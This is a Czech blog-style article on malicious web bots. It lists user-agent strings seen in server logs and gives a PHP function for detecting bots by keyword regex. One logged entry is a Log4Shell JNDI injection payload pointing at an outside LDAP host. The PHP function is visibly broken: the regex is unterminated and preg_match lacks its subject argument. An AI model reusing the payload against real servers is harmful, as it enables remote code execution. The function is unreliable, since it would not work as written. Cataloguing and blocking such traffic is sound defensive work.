Bad bot (Špatný bot) je automatizovaný program se škodlivým účelem. Ten je někdy tak přízemní, jako je nákup žádaných zásob dříve, než se k němu dostanou skuteční uživatelé.
V jiných případech jsou však tyto útoky mnohem závažnější – vyškrabávají informace o lidech z webových stránek, aby se nabourali do jejich účtů nebo vynesli citlivé údaje.
Blokaci nevyžádaného analytického trafiku jsme se věnovali v předešlém článku ipset a rovněž v textu iptables xt geoip blokace.
Obsah
Referer alias referent
Seznam nejčastějších referalů
nic
-
\
: \
:\
fasthttp
l9tcpid/v1.1.0
python-requests/2.18.4
python-requests/2.23.0
python-requests/2.27.1
python-requests/2.28.0
curl/7.47.0
curl/7.54.0
curl/7.68.0
curl/7.75.0
curl/7.64.1
Mozilla/5.0 zgrab/0.x
TelegramBot (like TwitterBot)
cortex/1.0
ALittle Client
Go http package
Go-http-client/1.1
Java/1.8.0_222
HeyTapBrowser/40.7.22.1
VLC/3.0.8 LibVLC/3.0.8
BaiduSpider
Chrome Privacy Preserving Prefetch Proxy
HTTP Banner Detection (https://security.ipip.net)
${jndi:ldap://167.71.13.196:443/lx-ffff2d58bc56901f08ac6dcd6100000000cb0d6e}
Lkx-TraversalHttpPlugin/0.0.1 (+https://leakix.net/, +https://twitter.com/HaboubiAnis)
Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler ; EmbeddedWB 14.52 from: http://www.bsalsa.com/
Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10
Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)
Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36
Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Mozilla/5.0 (compatible; Qwantify/1.0; +https://www.qwant.com/)
Mozilla/5.0 (compatible; t3versionsBot/1.0; +https://www.t3versions.com/bot)
Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers
Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36,gzip(gfe)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1)
SEO Scanner/1.2.4 (SEO Crawler; seoscanners.info; info@seoscanners.info)
Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)
Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)
Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)
facebookcatalog/1.0
Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com
Mozilla/4.0 (compatible; ms-office; MSOffice 16)
Apache-HttpClient/4.5.2 (Java/1.8.0_161)
Safari/537.36 [FB_IAB/FB4A;FBAV/372.1.0.23.107;]
facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)
Funkce pro detekci botů
function isBotDetected() {
if ( preg_match('/abacho|accona|AddThis|AdsBot|ahoy|AhrefsBot|AISearchBot|alexa|altavista|anthill|appie|applebot|arale|araneo|AraybOt|ariadne|arks|aspseek|ATN_Worldwide|Atomz|baiduspider|baidu|bbot|bingbot|bing|Bjaaland|BlackWidow|BotLink|bot|boxseabot|bspider|calif|CCBot|ChinaClaw|christcrawler|CMC\/0\.01|combine|confuzzledbot|contaxe|CoolBot|cosmos|crawler|crawlpaper|crawl|curl|cusco|cyberspyder|cydralspider|dataprovider|digger|DIIbot|DotBot|downloadexpress|DragonBot|DuckDuckBot|dwcp|EasouSpider|ebiness|ecollector|elfinbot|esculapio|ESI|esther|eStyle|Ezooms|facebookexternalhit|facebook|facebot|fastcrawler|FatBot|FDSE|FELIX IDE|fetch|fido|find|Firefly|fouineur|Freecrawl|froogle|gammaSpider|gazz|gcreep|geona|Getterrobo-Plus|get|girafabot|golem'])
) {
return true; // 'Above given bots detected'
}
return false;
} 